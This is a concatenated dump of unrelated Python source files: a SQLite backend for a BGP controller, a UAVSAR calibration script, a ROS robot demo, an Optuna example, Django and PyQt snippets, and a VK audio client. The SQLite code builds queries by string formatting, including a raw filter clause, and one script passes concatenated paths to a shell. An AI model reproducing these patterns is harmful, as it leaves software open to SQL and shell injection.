'/Users/dbarroso/Documents/workspace/pmacct_data/output/flows/pmacct.db' # Path to the SQLite database\n retention: 7 # Days to hold old data.\n \"\"\"\n\n def open(self):\n logger.info('action=OPEN_BACKEND backend=SQLITE file=%s' % self.conf['sqlite_file'])\n if not os.path.isfile(self.conf['sqlite_file']):\n raise Exception(\"Database file doesn't exist: %s\" % self.conf['sqlite_file'])\n\n self.con = lite.connect(self.conf['sqlite_file'])\n\n def close(self):\n logger.info('action=CLOSE_BACKEND backend=SQLITE file=%s' % self.conf['sqlite_file'])\n self.con.close()\n\n def _execute_query(self, query):\n try:\n self.con.row_factory = lite.Row\n cur = self.con.cursor()\n cur.execute(query)\n result = cur.fetchall()\n except lite.OperationalError:\n raise Exception('The following query failed:\\n%s' % query)\n\n return result\n\n def _get_pt(self, list, sampling=1):\n pt = PrefixTable()\n\n for p in list:\n prefix = Prefix(p[0], p[1], p[2], p[3], p[4], sampling)\n pt.add(prefix)\n\n return pt\n\n def get_best_prefixes(self, start_time, end_time, max_routes, packet_sampling):\n logger.debug('action=GET_BEST_PREFIXES start_time=%s end_time=%s' % (start_time, end_time))\n query = (\"\"\"\n SELECT ip_dst, mask_dst, AVG(bytes), AVG(packets), stamp_updated\n FROM acct\n WHERE datetime(stamp_updated) BETWEEN datetime('%s') AND datetime('%s')\n GROUP BY ip_dst, mask_dst ORDER BY AVG(bytes) DESC\n LIMIT %s;\n \"\"\") % (start_time, end_time, max_routes)\n return self._get_pt(self._execute_query(query), packet_sampling)\n\n def get_raw_prefixes(self, start_time, end_time, packet_sampling):\n logger.debug('action=GET_RAW_PREFIXES start_time=%s end_time=%s' % (start_time, end_time))\n query = (\"\"\"\n SELECT ip_dst, mask_dst, bytes, packets, stamp_updated\n FROM acct\n WHERE\n datetime(stamp_updated) BETWEEN datetime('%s') AND datetime('%s')\n AND\n stamp_updated = (\n SELECT MAX(stamp_updated) FROM acct\n WHERE datetime(stamp_updated) BETWEEN datetime('%s') AND datetime('%s')\n );\n \"\"\") % (start_time, end_time, start_time, end_time)\n return self._get_pt(self._execute_query(query), packet_sampling)\n\n def get_previous_prefixes(self, start_time, end_time):\n logger.debug('action=GET_PREVIOUS_PREFIXES start_time=%s end_time=%s' % (start_time, end_time))\n query = (\"\"\"\n SELECT ip_dst, mask_dst, bytes, packets, stamp_updated\n FROM best_prefixes\n WHERE\n datetime(stamp_updated) BETWEEN datetime('%s') AND datetime('%s')\n AND\n stamp_updated = (SELECT MAX(stamp_updated) FROM best_prefixes);\n \"\"\") % (start_time, end_time)\n\n return self._get_pt(self._execute_query(query))\n\n def save_prefix_table(self, prefix_table, date):\n logger.debug('action=SAVE_PREFIX_TABLE date=%s' % (date))\n cur = self.con.cursor()\n\n for prefix in prefix_table:\n values = (\n str(prefix.get_prefix_network()),\n prefix.get_prefix_mask(),\n prefix.get_packets(),\n prefix.get_bytes(),\n date.strftime('%Y-%m-%d %H:%M:%S')\n )\n cur.execute(\"INSERT INTO best_prefixes VALUES %s;\" % (str(values)))\n\n self.con.commit()\n\n def save_dict(self, data_dict, db_table):\n logger.debug('action=SAVE_DICT db_table=%s' % (db_table))\n\n columns = tuple(data_dict.keys())\n values = tuple(data_dict.values())\n\n cur = self.con.cursor()\n cur.execute(\"INSERT INTO %s %s VALUES %s;\" % (db_table, str(columns), str(values)))\n self.con.commit()\n\n def get_data_from_table(self, table, filter=None):\n logging.debug('action=GET_DATA_FROM_TABLE table=%s filter=%s' % (table, filter))\n if filter is None:\n query = (\"SELECT * FROM %s;\") % table\n else:\n query = (\"SELECT * FROM %s WHERE %s;\") % (table, filter)\n\n result = self._execute_query(query)\n result.insert(0, result[0].keys())\n return result\n\n def get_available_dates_in_range(self, start_time, end_time):\n logger.debug('action=GET_AVAILABLE_DATES_IN_RANGE start_time=%s end_time=%s' % (start_time, end_time))\n query = (\"\"\"\n SELECT stamp_updated FROM acct WHERE datetime(stamp_updated)\n BETWEEN datetime('%s') AND datetime('%s')\n GROUP BY stamp_updated;\n \"\"\") % (start_time, end_time)\n return self._execute_query(query)\n\n def _purge_databases(self, table, field, timestamp):\n query = ( \"\"\" DELETE FROM %s WHERE %s < datetime('%s') \"\"\" ) % (table, field, timestamp)\n self._execute_query(query)\n self.con.commit()\n\n def purge_data(self, current_time):\n purge_time = current_time - timedelta(hours = self.conf['retention'] * 24)\n\n logger.debug('action=PURGE_DATA date=%s' % (purge_time))\n\n self._purge_databases('acct', 'stamp_updated', purge_time)\n self._purge_databases('best_prefixes', 'stamp_updated', purge_time)\n","sub_path":"bgp_controller/backend/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":6412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"184509134","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExample script demonstrating batch radiometric calibration using vegetation\nLUTs.\n\nCalls functions contained in radiocal module to handle the batch processing.\n\nActual correction is performed by calling C programs.\n\nCreated on Tue May 26 11:32:00 2015\n\n@author: mdenbina\n\"\"\"\nimport numpy as np\nimport os\nimport subprocess\nimport multiprocessing as mp\nfrom multiprocessing import Pool\nimport complex_RTC # local fxn\nimport radiocal\n\n\n# print\nprint('Starting radiocal example script.')\n\n# sardata_base\nsardatabase_list='/home/ekyzivat/scripts/random-wetlands/data_paths/tooli-atq-2020-nov-6.txt' # rtc-run-1.txt rtc-test-1.txt' # path to list of UAVSAR IDs to run\nsardatabase=open(sardatabase_list).read().splitlines() # a list of UAVSAR IDs\n\n# uncomment for testing:\n# sardatabase = ['bakerc_16008_19059_012_190904_L090_CX_01/'] # ['bakerc_16008_18048_011_180822_L090_CX_02'] # ['bakerc_16008_19060_037_190905_L090'] # original: bakerc_16008_19060_037_190905_L090HHVV_CX_01.mlc #['padelE_36000_18047_000_180821_L090'] # _L090_CX_01\n\n# Root names pointing to the UAVSAR data to use for LUT creation, excluding the polarization and correction type (which get appended to this string to produce the full filename).\ndef sarDataPathNameFunction(sardata_str):\n sardatapath=sardata_str[0:-6]\n return sardatapath\nsardata = [sarDataPathNameFunction(sardata_str) for sardata_str in sardatabase] \n\n# Parent path to UAVSAR data files:\ndata_base_pth = '/att/nobackup/ekyzivat/UAVSAR/asf.alaska.edu' # '/att/nobackup/ekyzivat/tmp/rtc'\n\n# Path to the UAVSAR data files:\ndef dataPathNameFunction(data_base_pth, sardata_str):\n datapath=os.path.join(data_base_pth, sardata_str, 'raw'+os.sep)\n return datapath\ndatapath = [dataPathNameFunction(data_base_pth, sardata_str) for sardata_str in sardatabase] # list(map(dataPathNameFunction, data_base_pth, sardata)) # '/att/nobackup/ekyzivat/tmp/rtc/bakerc_16008_18048_011_180822_L090_CX_02/raw/' # '/att/nobackup/ekyzivat/tmp/rtc/padelE_36000_18047_000_180821_L090_CX_01/raw/'\n\n# Path to the folder containing the radiometric calibration programs\n# (e.g., uavsar_calib_veg_v2 and geocode_uavsar)\nprogrampath = '/home/ekyzivat/UAVSAR-rtc/'\n\n# Calibration program:\ncalibprog = programpath+'uavsar_calib'\n\n# Geocoding program:\ngeocodeprog = programpath+'uavsar_geocode'\n\n\n# min and max look angles, if post processing is enabled...\n# look angles outside these bounds will be set to zero:\n# choose values that will definitely have data- if you get close to the real min/max look, be sure to set min_samples to a high value, i.e. 10,000 to filter out tall trees/mountains etc that can cause outliers\nminlook = 24 #24 # 20.86 for PAD 2017\nmaxlook = 64 #64 # 65.55 for PAD 2017\n\n# Polarizations to correct:\npol = [0,1,2] #[0, 1, 2] #[0] #[0, 1, 2]\n\n\n# Subpaths pointing to a land cover or mask image to use for each UAVSAR scene.\n# len() of maskdata needs to be the same as the len() of sardata.\n\ndef maskNameFunction(str):\n maskName=str[0:-4]+'landcovermask.tif'\n return maskName\nmaskdata= list(map(maskNameFunction, sardata)) # [maskNameFunction(item) for item in sardata] # \n# maskdata = ['ABoVE_LandCover_PAD_2018.tif']\n\n\n# Path to save the LUT:\nLUTpath = '/att/nobackup/ekyzivat/UAVSAR/asf.alaska.edu/lut/' # '/att/nobackup/ekyzivat/tmp/rtc/lut/' # '/att/nobackup/ekyzivat/UAVSAR/asf.alaska.edu/lut/'\n\n# A name to describe the LUT:\nLUTname = sardata #'PAD2018'\n\n# A name to append to the filenames of the LUT corrected output:\ncalname='LUT'\n\n# The SAR image and the mask should have the same extents, pixel size, etc.\n# Trim the mask to the correct size (e.g., in QGIS) before running this.\n\n# Array of allowed values in the mask -- values other than these will be\n# excluded from the process. For a boolean mask this should equal True, to\n# include all pixels where the mask is True. For a land cover image, list\n# the class ID numbers of interest.\n# Note: For Louisiana data using CCAP land cover, classes 15 and 18 are both\n# emergent wetland (18: Estuarine Emergent Wetland, and 15: Palustrine\n# Emergent Wetland).\nallowed = range(1, 16) # [1, 2, 3, 4, 5, 6] # [14] # range(1, 16) # 14 refers to barren class! # 13 and 15 are water, 1-4 are trees, 5 and 6 are shrubs \n\n\n# These settings determine which pixels we use to generate the LUT, and which pixels are excluded, based on backscatter.\n# Note, these cutoff values should be based on HV backscatter. To be consistent between the polarizations, we always mask out\n# the same pixels for each polarization. The pixels excluded based on backscatter use the HVHV.\n# TODO add auto min/max look angle masking?\nmax_cutoff = np.inf # pixels above this value will be excluded\nmin_cutoff = 0 # pixels below this will be excluded\n\n\n# Set to true to assume range slope is zero, false otherwise:\nflatdemflag = True # HERE change\n\n# Constant height value for the created flat DEM:\nhgtval = 180\n\n# Note that this example script was created for wetland areas along the Gulf\n# Coast in Louisiana, United States. Here we have set flatdemflag to True\n# since there is minimal topography in this area. However, in areas with\n# significant topography, one should set flatdemflag to False in order\n# to calculate the terrain slope angle from the DEM. Here we create a\n# perfectly flat DEM which is approximately equal to the mean sea level\n# height in this area.\n\n\n# Savitzky-Golay filter to smooth LUT?\nsgfilterflag = True # set to True to filter, False to leave alone\nsgfilterwindow = 51 # filter window size--larger windows yield more smoothing\n\n# parallel pool size\npool_size=4 #mp.cpu_count() # change for custom\n\n# # STEP 1: Area Correction (in order to make the data to generate the LUT)\nprint('DOING AREA CORRECTION...')\npool = Pool(pool_size)\nfor num in range(0,len(sardata)): # do first and third steps all at once as loop; do second steps as loops within each step\n pool.apply_async(radiocal.batchcal, args=(datapath[num], programpath, calibprog, geocodeprog, \n None, # caltblroot\n 'area_only', # calname\n True, # docorrectionflag\n False, # zerodemflag\n False, # createmaskflag\n True, # createlookflag\n True, # createslopeflag\n True, # overwriteflag\n False, # postprocessflag\n minlook, # minlook\n maxlook, # maxlook\n pol, # pol\n hgtval, # hgtval\n sardata[num])) # scene \n# # radiocal.batchcal(datapath[num], programpath, calibprog, geocodeprog, None, calname='area_only', docorrectionflag=True, zerodemflag=True, createmaskflag=False, createlookflag=True, createslopeflag=True, overwriteflag=False, postprocessflag=False, pol=pol, hgtval=hgtval, scene=sardata[num])\npool.close()\npool.join()\n\n# # STEP 2: Create landcover mask images\nprint('BUILDING LANDCOVER MASKS FROM MOSAIC') # using my custom script (on path) to crop and reproject from landcover mosaic\nfor num in range(0,len(sardatabase)): \n target_align_file = datapath[num]+sardata[num][0:-4]+'slope'+'.grd' # just need ground-projected file to align to \n landcover_file=datapath[num]+sardata[num][0:-4]+'landcovermask.tif' # output of custom reprojection script\n if not os.path.isfile(landcover_file): # maybe add \"or overwriteflag\"\n print('BUILDING: {}'.format(landcover_file))\n print(subprocess.getoutput('gdal_reproject_match.sh /att/nobackup/ekyzivat/landcover/ABoVE_LandCover.vrt ' \\\n +landcover_file + ' '+ target_align_file))# HERE\n else: \n print('LANDCOVER MASK ALREADY BUILT: {}'.format(landcover_file))\n\n# # STEP 3: LUT Creation\nprint('CREATING LUT...')\npool = Pool(pool_size)\nfor num in range(0,len(sardata)): \n pool.apply_async(radiocal.createlut, args=(datapath[num], [sardata[num]], [maskdata[num]], LUTpath, LUTname[num], allowed, # no loop bc creatlut already does loop over 3 polarizations\n pol, 'area_only', min_cutoff,\n max_cutoff, flatdemflag, sgfilterflag, \n sgfilterwindow, None, None, 10)) # datapath[num], [sardata[num]], [maskdata[num]], LUTpath, LUTname[num], allowed, # no loop bc creatlut already does loop over 3 polarizationspol=pol, corrstr='area_only', min_cutoff=min_cutoff,max_cutoff=max_cutoff, flatdemflag=flatdemflag, sgfilterflag=sgfilterflag, sgfilterwindow=sgfilterwindow, min_look=minlook, max_look=maxlook, min_samples=10))\npool.close()\npool.join()\n\n\n# # STEP 4: LUT Correction\nprint('DOING LUT CORRECTION...')\npool = Pool(pool_size)\nfor num in range(0,len(sardata)): # do first steps all at once as loop; do second and third steps as loops within each step\n pool.apply_async(radiocal.batchcal, args=(datapath[num], programpath, calibprog, geocodeprog, \n LUTpath+'caltbl_'+LUTname[num], # caltblroot \n calname, # calname\n True, # docorrectionflag\n False, # zerodemflag\n True, # createmaskflag\n True, # createlookflag\n True, # createslopeflag\n True, # overwriteflag\n False, # postprocessflag\n minlook, # minlook\n maxlook, # maxlook\n pol, # pol\n hgtval, # hgtval\n sardata[num])) # scene \n# # radiocal.batchcal, args=(datapath[num], programpath, calibprog, geocodeprog, LUTpath+'caltbl_'+LUTname[num],calname=calname, docorrectionflag=True, zerodemflag=True, createmaskflag=True, createlookflag=True, createslopeflag=True, overwriteflag=False, postprocessflag=False, minlook=minlook, maxlook=maxlook, pol=pol, hgtval=hgtval))\npool.close()\npool.join()\n\n# STEP 5: Complex LUT Correction\nprint('DOING Complex LUT CORRECTION...')\npool = Pool(pool_size) #Pool(pool_size)\nfor num in range(0,len(sardata)): # [4]: # # do first steps all at once as loop; do second and third steps as loops within each step\n corrstr=sardatabase[num][-5:] # 'CX_01' or 'CX_02'\n pool.apply_async(complex_RTC.complexRTC, args=(\n sardata[num], #'bakerc_16008_19059_012_190904_L090', # base\n sardata[num][:-5], #'bakerc_16008_19059_012_190904', # lutBase=\n corrstr, #'CX_01', # corrstr\n calname, # 'LUT', # calname=\n datapath[num], #'/mnt/f/UAVSAR/bakerc_16008_19059_012_190904_L090_CX_01/raw/LUT', # lutDir=\n datapath[num][:-4]+'default_grd', #'/mnt/f/UAVSAR/bakerc_16008_19059_012_190904_L090_CX_01/raw/orig_grd', # origDir=\n datapath[num][:-4]+'complex_lut')) #'/mnt/f/UAVSAR/bakerc_16008_19059_012_190904_L090_CX_01/raw/auto_test')) # outDir=\n\npool.close()\npool.join()\n","sub_path":"python/radiocal_example_script_ek.py","file_name":"radiocal_example_script_ek.py","file_ext":"py","file_size_in_byte":12029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"446152350","text":"#!/usr/bin/python\n\n'''\nThis is an example node which subscribes to every topic and uses every service.\n'''\n\nimport sys, rospy\n\nfrom myp_ros.msg import *\nfrom myp_ros.srv import *\n\n'''\nA callback message for the subscibers.\n'''\ndef do_something(msg):\n\treturn\n\n'''\nInitialize the node.\n'''\nrospy.init_node('example')\n\n\n'''\nWait for the connection service to be provided by the PRob.\nConnect to the PRob using this service.\nPrint out the response.\n'''\nrospy.wait_for_service('connect')\nconnect = rospy.ServiceProxy('connect', ConnectionCommand)\nresp = connect('real', 'PRob2R', 'normal')\nrospy.loginfo(resp.message)\n\n\n'''\nSet up the subscribers.\n'''\nrospy.loginfo('Subscribing to all messages')\n\nsub1 = rospy.Subscriber('joint_angles', JointAngles, do_something)\nsub2 = rospy.Subscriber('current', Current, do_something)\nsub3 = rospy.Subscriber('digital_inputs', DigitalInputs, do_something)\nsub4 = rospy.Subscriber('pose', Pose, do_something)\nsub5 = rospy.Subscriber('posture', Posture, do_something)\nsub6 = rospy.Subscriber('sensor_packet', SensorPacket, do_something)\n\n\n'''\nTest each service\n'''\nrospy.loginfo('Using each service after ENTER is pressed')\n\nraw_input('Using service wait')\n\nwait = rospy.ServiceProxy('wait', Wait)\nresp = wait(2.5)\nrospy.loginfo(resp.message)\n\nraw_input('Using service open_gripper')\n\nopen_gripper = rospy.ServiceProxy('open_gripper', OpenGripper)\nresp = open_gripper()\nrospy.loginfo(resp.message)\n\nraw_input('Using service close_gripper')\n\nclose_gripper = rospy.ServiceProxy('close_gripper', CloseGripper)\nresp = close_gripper()\nrospy.loginfo(resp.message)\n\nraw_input('Using service move_joint')\n\nmove_joint = rospy.ServiceProxy('move_joint', MoveJoint)\nactuator_ids = ['1', '2', '3', '4', '5', '6']\nposition = [10.0, 10.0, 10.0, 10.0, 10.0, 10.0]\nresp = move_joint(actuator_ids=actuator_ids, position=position)\nrospy.loginfo(resp.message)\n\nraw_input('Using service move_to_pose')\n\nmove_to_pose = rospy.ServiceProxy('move_to_pose', MoveToPose)\nresp = move_to_pose(pose_name='pose_name')\nrospy.loginfo(resp.message)\n\nraw_input('Using service move_tool')\n\nmove_tool = rospy.ServiceProxy('move_tool', MoveTool)\nx, y, z = 0.0, 200.0, 920.0\norientation = [30.0, -20.0, -90.0]\nresp = move_tool(x=x, y=y, z=z, orientation=orientation)\nrospy.loginfo(resp.message)\n\nraw_input('Using service play_path')\n\nplay_path = rospy.ServiceProxy('play_path', PlayPath)\nresp = play_path(path_name='path_name')\nrospy.loginfo(resp.message)\n\nraw_input('Using service read_gripper_angle')\n\nread_gripper_angle = rospy.ServiceProxy('read_gripper_angle', ReadGripperAngle)\nresp = read_gripper_angle()\nrospy.loginfo(resp.message)\nrospy.loginfo(resp.gripper_angle)\n\nraw_input('Using service read_tcp_pose')\n\nread_tcp_pose = rospy.ServiceProxy('read_tcp_pose', ReadTcpPose)\nresp = read_tcp_pose()\nrospy.loginfo(resp.message)\nrospy.loginfo(resp.posture)\n\nraw_input('Using service recognize_object')\n\nrecognize_object = rospy.ServiceProxy('recognize_object', RecognizeObject)\nresp = recognize_object(lesson_name='lesson_name')\nrospy.loginfo(resp.message)\n\nraw_input('Using service run_simple_path')\n\nrun_simple_path = rospy.ServiceProxy('run_simple_path', RunSimplePath)\nactuator_ids = ['1', '2', '3', '4', '5', '6']\npositions = [[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], \n\t [10.0, 10.0, 10.0, 10.0, 10.0, 10.0],\n [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0]]\n\npath_data = [JointAngles(data=pos, names=actuator_ids, length=6) for pos in positions] \n\nresp = run_simple_path(path_data=path_data)\nrospy.loginfo(resp.message)\n\nraw_input('Using service say')\n\nsay = rospy.ServiceProxy('say', Say)\nresp = say(phrase='This is what I am saying.')\nrospy.loginfo(resp.message)\n\nraw_input('Using service wait_for_motor')\n\nwait_for_motor = rospy.ServiceProxy('wait_for_motor', WaitForMotor)\nactuator_ids = ['1', '2', '3', '4', '5', '6']\nresp = wait_for_motor(actuator_ids)\nrospy.loginfo(resp.message)\n\nraw_input('Using service write_digital_outputs')\n\nwrite_digital_outputs = rospy.ServiceProxy('write_digital_outputs', WriteDigitalOutputs)\nresp = write_digital_outputs(mask=200)\nrospy.loginfo(resp.message)\n\nraw_input('Using service get_sensors')\n\nget_sensors = rospy.ServiceProxy('get_sensors', GetSensors)\nresp = get_sensors()\nrospy.loginfo(resp.message)\nrospy.loginfo(resp.sensors)\n\nraw_input('Using service send_sensor_instruction')\n\nsend_sensor_instruction = rospy.ServiceProxy('send_sensor_instruction', SendSensorInstruction)\nresp = send_sensor_instruction('mySensor', '1')\nrospy.loginfo(resp.message)\n\n\nraw_input('Using service remove_sensor')\n\nremove_sensor = rospy.ServiceProxy('remove_sensor', RemoveSensor)\nresp = remove_sensor('mySensor')\nrospy.loginfo(resp.message)\n\nrospy.loginfo('All done, disconnecting!')\nresp = connect(robot_kind='disconnect')\nrospy.loginfo(resp.message)\n\n","sub_path":"scripts/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"411703973","text":"\"\"\"\nOptuna example that optimizes multi-layer perceptrons using Tensorflow (Eager Execution).\n\nIn this example, we optimize the validation accuracy of hand-written digit recognition using\nTensorflow and MNIST. We optimize the neural network architecture as well as the optimizer\nconfiguration.\n\nWe have the following two ways to execute this example:\n\n(1) Execute this code directly.\n $ python tensorflow_eager_simple.py\n\n\n(2) Execute through CLI.\n $ STUDY_NAME=`optuna create-study --direction maximize --storage sqlite:///example.db`\n $ optuna study optimize tensorflow_eager_simple.py objective --n-trials=100 \\\n --study $STUDY_NAME --storage sqlite:///example.db\n\n\"\"\"\n\nimport tensorflow as tf\nimport tensorflow.contrib.eager as tfe\nfrom tensorflow.keras.datasets import mnist\n\nN_TRAIN_EXAMPLES = 3000\nN_TEST_EXAMPLES = 1000\nBATCHSIZE = 128\nCLASSES = 10\nEPOCHS = 1\ntf.enable_eager_execution()\n\n\ndef create_model(trial):\n # We optimize the numbers of layers, their units and weight decay parameter.\n n_layers = trial.suggest_int('n_layers', 1, 3)\n weight_decay = trial.suggest_loguniform('weight_decay', 1e-10, 1e-3)\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Flatten())\n for i in range(n_layers):\n num_hidden = int(trial.suggest_loguniform('n_units_l{}'.format(i), 4, 128))\n model.add(\n tf.keras.layers.Dense(num_hidden,\n activation='relu',\n kernel_regularizer=tf.keras.regularizers.l2(weight_decay)))\n model.add(\n tf.keras.layers.Dense(CLASSES, kernel_regularizer=tf.keras.regularizers.l2(weight_decay)))\n return model\n\n\ndef create_optimizer(trial):\n # We optimize the choice of optimizers as well as their parameters.\n kwargs = {}\n optimizer_options = ['RMSPropOptimizer', 'AdamOptimizer', 'MomentumOptimizer']\n optimizer_selected = trial.suggest_categorical('optimizer', optimizer_options)\n if optimizer_selected == 'RMSPropOptimizer':\n kwargs['learning_rate'] = trial.suggest_loguniform('rmsprop_learning_rate', 1e-5, 1e-1)\n kwargs['decay'] = trial.suggest_uniform('rmsprop_decay', 0.85, 0.99)\n kwargs['momentum'] = trial.suggest_loguniform('rmsprop_momentum', 1e-5, 1e-1)\n elif optimizer_selected == 'AdamOptimizer':\n kwargs['learning_rate'] = trial.suggest_loguniform('adam_learning_rate', 1e-5, 1e-1)\n elif optimizer_selected == 'MomentumOptimizer':\n kwargs['learning_rate'] = trial.suggest_loguniform('momentum_opt_learning_rate', 1e-5,\n 1e-1)\n kwargs['momentum'] = trial.suggest_loguniform('momentum_opt_momentum', 1e-5, 1e-1)\n\n optimizer = getattr(tf.train, optimizer_selected)(**kwargs)\n return optimizer\n\n\ndef learn(model, optimizer, dataset, mode='eval'):\n accuracy = tfe.metrics.Accuracy('accuracy', dtype=tf.float32)\n\n for batch, (images, labels) in enumerate(dataset):\n with tf.GradientTape() as tape:\n logits = model(images, training=(mode == 'train'))\n loss_value = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels))\n if mode == 'eval':\n accuracy(tf.argmax(logits, axis=1, output_type=tf.int64),\n tf.cast(labels, tf.int64))\n else:\n grads = tape.gradient(loss_value, model.variables)\n optimizer.apply_gradients(zip(grads, model.variables))\n\n if mode == 'eval':\n return accuracy\n\n\ndef get_mnist():\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n x_train = x_train.astype('float32') / 255\n x_test = x_test.astype('float32') / 255\n\n y_train = y_train.astype('int32')\n y_test = y_test.astype('int32')\n\n train_ds = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n train_ds = train_ds.shuffle(60000).batch(BATCHSIZE).take(N_TRAIN_EXAMPLES)\n\n test_ds = tf.data.Dataset.from_tensor_slices((x_test, y_test))\n test_ds = test_ds.shuffle(10000).batch(BATCHSIZE).take(N_TEST_EXAMPLES)\n return train_ds, test_ds\n\n\n# FYI: Objective functions can take additional arguments\n# (https://optuna.readthedocs.io/en/stable/faq.html#objective-func-additional-args).\ndef objective(trial):\n # Get MNIST data.\n train_ds, test_ds = get_mnist()\n\n # Build model and optimizer.\n model = create_model(trial)\n optimizer = create_optimizer(trial)\n\n # Training and validating cycle.\n with tf.device(\"/cpu:0\"):\n for _ in range(EPOCHS):\n learn(model, optimizer, train_ds, 'train')\n\n accuracy = learn(model, optimizer, test_ds, 'eval')\n\n # Return last validation accuracy.\n return accuracy.result()\n\n\nif __name__ == '__main__':\n import optuna\n\n study = optuna.create_study(direction='maximize')\n study.optimize(objective, n_trials=100)\n\n print('Number of finished trials: ', len(study.trials))\n\n print('Best trial:')\n trial = study.best_trial\n\n print(' Value: ', trial.value)\n\n print(' Params: ')\n for key, value in trial.params.items():\n print(' {}: {}'.format(key, value))\n","sub_path":"examples/tensorflow_eager_simple.py","file_name":"tensorflow_eager_simple.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"583783839","text":"# -*- coding: utf-8 -*-\n\"\"\"\nauthor: xuan\ntime: 2018/10/15 15:27\n\"\"\"\n# from django.conf.urls import url, include\nfrom django.urls import path, include\nfrom django.contrib.auth.models import User\nfrom rest_framework import routers, serializers, viewsets\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ('url', 'username', 'email', 'is_staff')\n\t\t\n\nclass UserViewSet(viewsets.ModelViewSet):\n\tqueryset = User.objects.all()\n\tserializers_class = UserSerializer\n\n\nrouter = routers.DefaultRouter()\nrouter.register('users', UserViewSet)\n\n\nurlpatterns = [\n\tpath('', include(router.urls)),\n\tpath('api-auth', include('rest_framework.urls', namespace='rest_framework')),\n]","sub_path":"django_demo/user_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"549322987","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import *\n\nclass ContactUs(object):\n def __init__(self,parents):\n super().__init__()\n self.frame = QWidget(parents)\n self.frame.setObjectName(\"Frame\")\n self.frame.resize(1200, 900)\n self.frame.setFixedSize(1200, 900)\n\n self.init_frame()\n\n def init_frame(self):\n self.pushButton_1 = QtWidgets.QPushButton(\"正常考试模式\", self.frame)\n self.pushButton_1.setObjectName(\"HomeButton\")\n # self.pushButton_1.setIcon(QIcon(\"../images/考试.png\"))\n self.pushButton_1.setFixedSize(300, 50)\n self.pushButton_1.move(450,700)\n self.pushButton_1.setText(\"返回主菜单\")\n\n self.LineEdit_1 = QLineEdit(self.frame)\n self.LineEdit_1.setFixedSize(800, 50)\n self.LineEdit_1.move(200,400)\n\n self.LineEdit_2 = QLineEdit(self.frame)\n self.LineEdit_2.setFixedSize(800, 50)\n self.LineEdit_2.move(200,500)\n\n self.LineEdit_1.setAlignment(Qt.AlignCenter)\n self.LineEdit_2.setAlignment(Qt.AlignCenter)\n self.LineEdit_1.setStyleSheet(\"color:black;font:25px;background:transparent;border-width:0;border-style:outset\")\n self.LineEdit_2.setStyleSheet(\"color:black;font:25px;background:transparent;border-width:0;border-style:outset\")\n self.LineEdit_1.setReadOnly(True)\n self.LineEdit_2.setReadOnly(True)\n self.LineEdit_1.setText(\"如果在使用过程中遇到问题或着有改进的建议,可通过以下方式联系我们\")\n self.LineEdit_2.setText(\"425185455@qq.com\")\n\n\n self.frame.setStyleSheet('''\n QPushButton{border:none;color:white;font-size:30px}\n QPushButton:hover{\n border-left:4px solid white;\n font-size:35px;\n background:#4affa5;\n border-top:1px solid white;\n border-bottom:1px solid white;\n border-left:1px solid white;\n border-top-left-radius:10px;\n border-bottom-left-radius:10px;\n border-top-right-radius:10px;\n border-bottom-right-radius:10px;\n }\n \n QWidget#Frame{\n border-image:url(../images/screen4.jpg);\n border-top:1px solid white;\n border-bottom:1px solid white;\n border-right:1px solid white;\n border-top-left-radius:10px;\n border-bottom-left-radius:10px;\n border-top-right-radius:10px;\n border-bottom-right-radius:10px;\n }\n ''')","sub_path":"手势识别/pyqt/update/ContactUs.py","file_name":"ContactUs.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"172387834","text":"import urllib\nfrom models import Audio\nimport requests\nfrom api.services.service import Service\n\n\nclass Vkontakte(Service):\n def _search(self, **kwargs):\n data = requests.get(\n 'https://api.vk.com/method/audio.search?' + urllib.parse.urlencode({\n 'q': kwargs.get('query', ''),\n 'auto_complete': 1,\n 'sort': 0,\n 'count': self.limit,\n 'offset': kwargs.get('offset', 0),\n 'access_token': self.access_token,\n })\n )\n\n for audio in data.json().get('response', [])[1:]:\n url = urllib.parse.urlparse(audio.get('url'))\n if '/audios/' not in url[2]:\n yield Audio(**audio)","sub_path":"server/api/services/vkontakte/vkontakte.py","file_name":"vkontakte.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"542652016","text":"from django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.conf import settings\nfrom PIL import Image,ImageEnhance,ImageDraw # PIL\nimport os,re\n\ndef get_upload_file_name(instance,filename):\n return \"image_styles/%s/%s\" % (instance.style.name,filename)\n\n\nclass Style(models.Model):\n name = models.SlugField(max_length=127,unique=True)\n \n def delete_images(self):\n ImageStyle.objects.filter(style=self).delete()\n\n def get_effects(self):\n effects = []\n effect_objects = [Crop,Enhance,Resize,Rotate,Scale,SmartScale,RoundCorners]\n for effect_object in effect_objects:\n es = effect_object.objects.filter(style=self)\n for e in es:\n re_type = re.match(r\"\",str(type(e)))\n if len(re_type.groups()) == 1:\n name = re_type.group(1)\n else:\n name = ''\n effects.append({\n 'weight':e.weight,\n 'object':e,\n 'name':name,\n })\n effects = sorted(effects, key=lambda k: k['weight'])\n return effects\n\n def __str__(self):\n return '%d: %s' % (self.id,self.name)\n\n class 